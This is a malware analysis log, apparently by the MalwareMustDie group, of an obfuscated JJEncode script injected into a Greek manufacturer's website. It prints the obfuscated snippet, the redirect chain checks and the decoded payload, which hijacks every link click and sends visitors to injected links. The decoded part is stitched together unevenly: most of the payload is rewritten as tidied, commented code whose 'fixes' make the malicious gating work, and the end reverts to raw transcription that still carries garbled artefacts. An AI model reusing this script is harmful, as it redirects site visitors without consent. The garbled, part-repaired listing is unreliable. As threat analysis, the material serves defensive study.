- ===============================================
- The suspected JS/Agent/Downloader Trojan
- #MalwareMustDie | @unixfreaxjp | Sat Oct 27 02:06:28 JST 2012
- Update: Sat Oct 27 14:19:55 JST 2012 (Decoded JJencode)
- ===============================================
- // checking a hint...
- $ myfetch h00p://www.iliosak.gr/index.php
- --proxy=1
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --referer="h00p://www.google.com/search?q=gmail"
- --target="h00p://www.iliosak.gr/index.php"
- --01:17:44-- h00p://www.iliosak.gr/index.php
- => `index.php'
- Connecting to 192.168.7.11:8118... connected.
- Proxy request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 01:17:48 (19.24 KB/s) - `index.php' saved [51627]
- // peek inside...
- $ head index.php
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h00p://www.w3.or
- g/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr"
- dir="ltr" >
- <head>
- <SCRIPT type="text/javascript"> <!--
- $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$
- :({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$
- :++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=
- $+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$.
- _$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])
- +$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_ :
- // ↑ nice! :-)
- // 1. whoever injected this tried to hide the script (a <SCRIPT> dropped into <head>, immediately followed by an HTML comment opener)...
- // 2. JJEncode obfuscation — far too suspicious to ignore on a legitimate product site..
- // 3. what is the purpose behind this?
- // A Greek-language site (a solar water-heater manufacturer, judging by the meta tags)...ok.
- <meta name="keywords" content="Ηλιακοί
- θερμοσίφωνες,ηλιακός θερμοσίφωνας,Ηλιακά συστήματα,ηλιακοί,φωτοβολταϊκά,κλιματισμός,θέρμανση,Μεσσηνία" />
- <meta name="description" content="Εργοστάσιο κατασκευής ηλιακών συστημάτων και εφαρμογών φωτοβολταϊκών θέρμανσης & κλιματισμού στη Μεσσηνία από το 1977.
- // The obfuscated JavaScript is under analysis (decoded result below)....
- // OTHER resources requested by the page are....
- // requesting:
- h00p://www.iliosak.gr/templates/yoo_switch/lib/js/mootools.js.php .......CLEAN
- h00p://www.iliosak.gr/media/system/js/caption.js .......CLEAN
- h00p://www.iliosak.gr/templates/yoo_switch/lib/js/template.js.php .......CLEAN
- h00p://www.iliosak.gr/modules/mod_virtuemart/vm_transmenu/transmenu.js .......CLEAN
- // redirecting..
- h00p://crotopole.eu/a41bb3d1c7 ⇒ h00p://www.cam4cam.fr/
- --01:40:46-- h00p://crotopole.eu/a41bb3d1c7
- => `a41bb3d1c7'
- Resolving crotopole.eu... 88.191.151.166
- Connecting to crotopole.eu|88.191.151.166|:80... connected.
- h00p request sent, awaiting response... 301 Moved Permanently
- Location: h00p://www.cam4cam.fr/ [following]
- --01:40:46-- h00p://www.cam4cam.fr/
- => `index.html'
- Resolving www.cam4cam.fr... 88.191.151.166
- Reusing existing connection to crotopole.eu:80.
- h00p request sent, awaiting response... 200 OK
- Length: 5,961 (5.8K) [text/html]
- // the redirect target is a WordPress blog ↓ ............CLEAN one.....
- #Penguinzophren, Sentimancho | Cam4 cam | Chatroulette & Chat webcam
- #Penguinzophren Vs Sentimancho RSS Feed
- Penguinzophren Vs Sentimancho
- * Penguinzophren Vs Sentimancho
- *
- * Non classé
- Matt Cutts Vs Black Hat
- Sentimancho Vs Penguinzophren
- Non classé | riko | Comments (0) |
- Le but du concours est de : Niker MC et GG (pour les intimes) Tu l'auras compris mon titre veut tout dire, Matt cutts
- je veux ta peau! Celle du Penguinzophren ainsi que celle du Sentimancho . Matt Cutts le pingouin en slip Penguinzophren
- et Sentimancho pour moi et tous les referenceurs qui participent de près où de lien à cette grande cage aux folles
- // and a download....
- h00p://www.cres.gr/energy-saving/SCRIPT_2.htm...... clean!...
- // So it all comes down to the JavaScript decoding result...
- // Handed over to the two geniuses on our crack team — thanks, guys!
- // The JJEncode decodes to the script below. It gates on the visitor: a user-agent check for Chrome / Google Toolbar and a referrer check (note that, as transcribed, the referrer clause `referrer!='' || referrer.indexOf(domain)==-1` is always true for a non-empty document.domain, so every visitor passes it); it then sets a one-year 'c_first' cookie so the payload only fires on the first visit, and adds a random 1-in-5 gate (c_index). When all gates pass, on page load it collects the hrefs inside the element with id 'mlk' and, on any click on any link of the page, rewrites the clicked link's href to a random one of those — i.e. it hijacks the site's own links to redirect visitors to the injected link list (typical blackhat-SEO / traffic-redirection payload). Two spots look like decode/transcription artefacts rather than the original code: `document.cookie.lengthj` (almost certainly `length>0`) and `c_index=O` (almost certainly `c_index==0`).
- ((function $anonymous$(){return" page_links = [];
/**
 * Register `f` to run once the page has loaded.
 *
 * Prefers the standard `addEventListener("load", …)` on `window`, then the
 * legacy IE `attachEvent("onload", …)`, then `document.addEventListener`; as a
 * last resort it chains `f` behind an already-installed `window.onload`
 * handler (the earlier handler runs first) or assigns `window.onload` directly.
 *
 * @param {Function} f - handler to run on load; in the `window.onload`
 *   fallback path it is called with no arguments.
 */
function setGlobalOnLoad(f) {
  var hasWindowEvents = window.addEventListener || window.attachEvent;
  var target = null;
  if (hasWindowEvents) {
    target = window;
  } else if (document.addEventListener) {
    target = document;
  }

  if (!target) {
    // No event API available at all: fall back to the onload property while
    // preserving whatever handler is already installed.
    var previous = window.onload;
    if (typeof previous == 'function') {
      window.onload = function () {
        previous();
        f();
      };
    } else {
      window.onload = f;
    }
    return;
  }

  if (target.addEventListener) {
    target.addEventListener("load", f, false);
  } else if (target.attachEvent) {
    target.attachEvent("onload", f);
  }
}
/**
 * Attach `handler` for `event` on `object`, using the standard
 * `addEventListener` when present and the legacy IE `attachEvent` (which
 * expects the `on`-prefixed event name) otherwise. Silently does nothing if
 * the object supports neither API.
 *
 * @param {Object} object - event target (element, window or document)
 * @param {string} event - event name without the `on` prefix, e.g. "click"
 * @param {Function} handler - listener to invoke
 */
function addHandler(object, event, handler) {
  var hasStandardApi = typeof object.addEventListener != 'undefined';
  var hasLegacyApi = typeof object.attachEvent != 'undefined';
  if (hasStandardApi) {
    object.addEventListener(event, handler, false);
    return;
  }
  if (hasLegacyApi) {
    object.attachEvent('on' + event, handler);
  }
}
// Visitor gate. right_browser is 'yes' when the user agent looks like Chrome
// or the Google Toolbar, or when the referrer is non-empty, or when the
// referrer does not contain document.domain.
//
// NOTE(review): as transcribed, the two referrer clauses form a tautology for a
// non-empty document.domain — an empty referrer makes indexOf(document.domain)
// return -1 — so every visitor ends up with 'yes'. This may be a decode /
// transcription artefact (an `&&` rendered as `||`); confirm against the raw
// JJEncode before relying on it.
var right_browser = (
  window.navigator.userAgent.match(/gtb/i) ||
  window.navigator.userAgent.match(/chrome/i) ||
  document.referrer != '' ||
  document.referrer.indexOf(document.domain) == -1
) ? 'yes' : 'no';
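/**
 * Read a cookie value by name from document.cookie.
 *
 * Scans the raw cookie string for `c_name=` and returns the (unescaped) value
 * up to the next ';', or "" when the cookie string is empty or the name is
 * not present.
 *
 * Fixes relative to the decoded listing:
 *  - `document.cookie.lengthj` is a transcription error: the property does not
 *    exist, so the branch never ran and every lookup returned "" (which made
 *    the first-visit check downstream always pass). Restored to the standard
 *    `document.cookie.length > 0` test.
 *  - `c_start` / `c_end` were assigned without declaration and leaked as
 *    globals (a ReferenceError under strict mode); they are now locals.
 *
 * Intentionally kept: the lookup is a plain substring match, so
 * `getCookie('a')` also matches a cookie named `xa`, and `unescape` (not
 * decodeURIComponent) is used to stay byte-for-byte with the original value
 * decoding.
 *
 * @param {string} c_name - cookie name to look up
 * @returns {string} the cookie value, or "" if absent
 */
function getCookie(c_name)
{
  var cookies = document.cookie;
  if (cookies.length > 0) {
    var c_start = cookies.indexOf(c_name + "=");
    if (c_start != -1) {
      c_start = c_start + c_name.length + 1;
      var c_end = cookies.indexOf(";", c_start);
      if (c_end == -1) c_end = cookies.length;
      return unescape(cookies.substring(c_start, c_end));
    }
  }
  return "";
}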
// Expiry for the first-visit marker: 365 days from now.
var exdate = new Date();
exdate.setDate(exdate.getDate() + 365);

// Random bucket 0..4 — presumably compared against 0 further down as a
// 1-in-5 trigger gate (the decode shows `c_index=O`, which looks like a
// mangled `c_index==0`; confirm against the raw JJEncode).
var c_index = Math.floor(Math.random() * 5);

// Read the first-visit marker BEFORE it is (re)written below, so a returning
// visitor sees 'false' and a first-time visitor sees "".
var fcoo = getCookie('c_first');

// Mark this browser as already visited for a year. escape('false') is just
// "false"; kept to reproduce the original cookie string exactly.
document.cookie = ['c_first', '=', escape('false'), ';expires=', exdate.toUTCString()].join('');
- if (c_index=O && fcoo!='false' && right_browser=='yes') {
- setGlobalOnLoad(function() {
- var block = document.getElementById('mlk');
- var links = block.getElementsByTagName('A');
- for (var i = 0; i < links.length; i++) {
- page_links.push(links[i].href);
- }
- var links = document.links;
- for (var i = 0; i < links.length; i++) {
- addHandler(links[i], \"click\", function(event) {
- var index = Math.floor(Math.random() * (page_links.length - 1));
- event.target.href = page_links[index];
- });
- }
- });
- #MalwareMustDie!